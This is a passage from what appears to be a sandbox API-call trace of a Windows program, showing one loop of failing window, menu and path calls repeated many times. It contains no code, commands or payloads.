returned 0 [0176.112] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.112] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.112] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.112] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.112] GetMenu (hWnd=0x0) returned 0x0 [0176.112] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.112] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.112] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.112] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.112] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.112] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.112] GetStockObject (i=6) returned 0x1b00018 [0176.112] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.112] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.112] PathFileExistsW (pszPath=0x0) returned 0 [0176.112] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.112] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.112] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.112] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.112] GetMenu (hWnd=0x0) returned 0x0 [0176.112] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x34f) returned -1 [0176.112] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.112] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.112] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.112] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.112] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.113] GetStockObject (i=6) returned 0x1b00018 [0176.113] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.113] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.113] PathFileExistsW (pszPath=0x0) returned 0 [0176.113] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.113] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.113] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.113] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.113] GetMenu (hWnd=0x0) returned 0x0 [0176.113] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x43c) returned -1 [0176.113] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.113] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.113] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.113] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.113] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.113] GetStockObject (i=6) returned 0x1b00018 [0176.113] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.113] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.113] PathFileExistsW (pszPath=0x0) returned 0 [0176.113] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.113] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.113] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.113] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.113] GetMenu (hWnd=0x0) returned 0x0 [0176.113] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.113] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.113] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.113] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.113] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.113] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.113] GetStockObject (i=6) returned 0x1b00018 [0176.113] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.113] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.113] PathFileExistsW (pszPath=0x0) returned 0 [0176.113] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.114] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.114] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.114] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.114] GetMenu (hWnd=0x0) returned 0x0 [0176.114] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x355) returned -1 [0176.114] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.114] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.114] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.114] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.114] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.114] GetStockObject (i=6) returned 0x1b00018 [0176.114] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.114] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.114] PathFileExistsW (pszPath=0x0) returned 0 [0176.114] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.114] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.114] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.114] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.114] GetMenu (hWnd=0x0) returned 0x0 [0176.114] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.114] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.114] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.114] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.114] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.114] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.114] GetStockObject (i=6) returned 0x1b00018 [0176.114] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.114] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.114] PathFileExistsW (pszPath=0x0) returned 0 [0176.114] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.114] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.114] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.114] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.114] GetMenu (hWnd=0x0) returned 0x0 [0176.114] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x351) returned -1 [0176.115] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.115] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.115] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.115] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.115] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.115] GetStockObject (i=6) returned 0x1b00018 [0176.115] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.115] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.115] PathFileExistsW (pszPath=0x0) returned 0 [0176.115] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.115] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.115] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.115] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.115] GetMenu (hWnd=0x0) returned 0x0 [0176.115] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x3f7) returned -1 [0176.115] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.115] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.115] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.115] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.115] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.115] GetStockObject (i=6) returned 0x1b00018 [0176.115] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.115] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.115] PathFileExistsW (pszPath=0x0) returned 0 [0176.115] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.115] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.115] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.115] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.115] GetMenu (hWnd=0x0) returned 0x0 [0176.115] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.115] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.115] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.115] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.115] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.115] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.116] GetStockObject (i=6) returned 0x1b00018 [0176.116] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.116] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.116] PathFileExistsW (pszPath=0x0) returned 0 [0176.116] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.116] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.116] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.116] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.116] GetMenu (hWnd=0x0) returned 0x0 [0176.116] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.116] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.116] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.116] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.116] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.116] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.116] GetStockObject (i=6) returned 0x1b00018 [0176.116] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.116] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.116] PathFileExistsW (pszPath=0x0) returned 0 [0176.116] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.116] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.116] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.116] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.116] GetMenu (hWnd=0x0) returned 0x0 [0176.116] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.116] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.116] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.116] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.116] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.116] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.116] GetStockObject (i=6) returned 0x1b00018 [0176.116] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.116] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.116] PathFileExistsW (pszPath=0x0) returned 0 [0176.116] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.117] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.117] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.117] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.117] GetMenu (hWnd=0x0) returned 0x0 [0176.117] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.117] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.117] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.117] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.117] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.117] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.117] GetStockObject (i=6) returned 0x1b00018 [0176.117] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.117] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.117] PathFileExistsW (pszPath=0x0) returned 0 [0176.117] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.117] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.117] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.117] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.117] GetMenu (hWnd=0x0) returned 0x0 [0176.117] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x16d) returned -1 [0176.117] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.117] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.117] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.117] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.117] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.117] GetStockObject (i=6) returned 0x1b00018 [0176.117] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.117] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.117] PathFileExistsW (pszPath=0x0) returned 0 [0176.117] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.117] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.117] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.117] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.118] GetMenu (hWnd=0x0) returned 0x0 [0176.118] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.118] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.118] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.118] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.118] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.118] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.118] GetStockObject (i=6) returned 0x1b00018 [0176.118] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.118] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.118] PathFileExistsW (pszPath=0x0) returned 0 [0176.118] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.118] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.118] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.118] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.118] GetMenu (hWnd=0x0) returned 0x0 [0176.118] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x353) returned -1 [0176.118] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.118] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.118] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.118] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.118] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.118] GetStockObject (i=6) returned 0x1b00018 [0176.118] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.118] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.118] PathFileExistsW (pszPath=0x0) returned 0 [0176.118] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.118] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.118] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.118] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.118] GetMenu (hWnd=0x0) returned 0x0 [0176.118] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.118] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.118] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.118] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.119] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.119] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.119] GetStockObject (i=6) returned 0x1b00018 [0176.119] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.119] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.119] PathFileExistsW (pszPath=0x0) returned 0 [0176.119] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.119] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.119] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.119] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.119] GetMenu (hWnd=0x0) returned 0x0 [0176.119] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x354) returned -1 [0176.119] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.119] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.119] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.119] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.119] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.119] GetStockObject (i=6) returned 0x1b00018 [0176.119] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.119] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.119] PathFileExistsW (pszPath=0x0) returned 0 [0176.119] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.119] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.119] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.119] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.119] GetMenu (hWnd=0x0) returned 0x0 [0176.119] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x19e) returned -1 [0176.119] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.119] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.119] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.119] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.119] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.119] GetStockObject (i=6) returned 0x1b00018 [0176.119] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.119] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.120] PathFileExistsW (pszPath=0x0) returned 0 [0176.120] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.120] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.120] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.120] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.120] GetMenu (hWnd=0x0) returned 0x0 [0176.120] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.120] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.120] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.120] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.120] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.120] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.120] GetStockObject (i=6) returned 0x1b00018 [0176.120] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.120] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.120] PathFileExistsW (pszPath=0x0) returned 0 [0176.120] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.120] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.120] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.120] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.120] GetMenu (hWnd=0x0) returned 0x0 [0176.120] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x34f) returned -1 [0176.120] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.120] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.120] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.120] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.120] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.120] GetStockObject 